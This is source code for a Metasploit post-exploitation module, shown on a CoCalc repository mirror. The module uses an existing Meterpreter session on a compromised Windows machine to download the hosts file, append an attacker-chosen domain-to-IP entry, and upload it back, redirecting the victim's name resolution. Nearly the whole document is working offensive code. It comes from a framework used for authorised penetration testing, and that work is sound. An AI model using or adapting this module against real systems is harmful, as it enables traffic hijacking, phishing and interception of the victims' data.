Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/manage/inject_host.rb
19851 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'English'

7
class MetasploitModule < Msf::Post

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Windows Manage Hosts File Injection',

14
        'Description' => %q{

15
          This module allows the attacker to insert a new entry into the target

16
          system's hosts file.

17
        },

18
        'License' => BSD_LICENSE,

19
        'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],

20
        'Platform' => [ 'win' ],

21
        'SessionTypes' => [ 'meterpreter' ],

22
        'Compat' => {

23
          'Meterpreter' => {

24
            'Commands' => %w[

25
              core_channel_close

26
              core_channel_eof

27
              core_channel_open

28
              core_channel_read

29
              core_channel_tell

30
              core_channel_write

31
              stdapi_fs_stat

32
            ]

33
          }

34
        },

35
        'Notes' => {

36
          'Stability' => [CRASH_SAFE],

37
          'SideEffects' => [CONFIG_CHANGES],

38
          'Reliability' => []

39
        }

40
      )

41
    )

42


43
    register_options([

44
      OptString.new('DOMAIN', [ true, 'Domain name for host file manipulation.' ]),

45
      OptString.new('IP', [ true, 'IP address to point domain name to.' ])

46
    ])

47
  end

48


49
  def run

50
    ip = datastore['IP']

51
    hostname = datastore['DOMAIN']

52


53
    if ip.blank? || hostname.blank?

54
      fail_with(Failure::BadConfig, 'Please specify both DOMAIN and IP.')

55
    end

56


57
    hosts_file_path = session.sys.config.getenv('SYSTEMROOT') + '\\System32\\drivers\\etc\\hosts'

58


59
    meterp_temp = Tempfile.new('meterp')

60
    meterp_temp.binmode

61
    temp_path = meterp_temp.path

62


63
    begin

64
      # Download the remote file to the temporary file

65
      client.fs.file.download_file(temp_path, hosts_file_path)

66
    rescue Rex::Post::Meterpreter::RequestError => e

67
      # If the file doesn't exist, then it's okay.  Otherwise, throw the error

68
      raise $ERROR_INFO unless e.result == 2

69
    end

70


71
    print_status("Inserting hosts file entry pointing #{hostname} to #{ip}..")

72
    hostsfile = ::File.open(temp_path, 'ab')

73
    hostsfile.write("\r\n#{ip}\t#{hostname}")

74
    hostsfile.close

75


76
    client.fs.file.upload_file(hosts_file_path, temp_path)

77
    print_good('Done!')

78
  end

79
end

80


81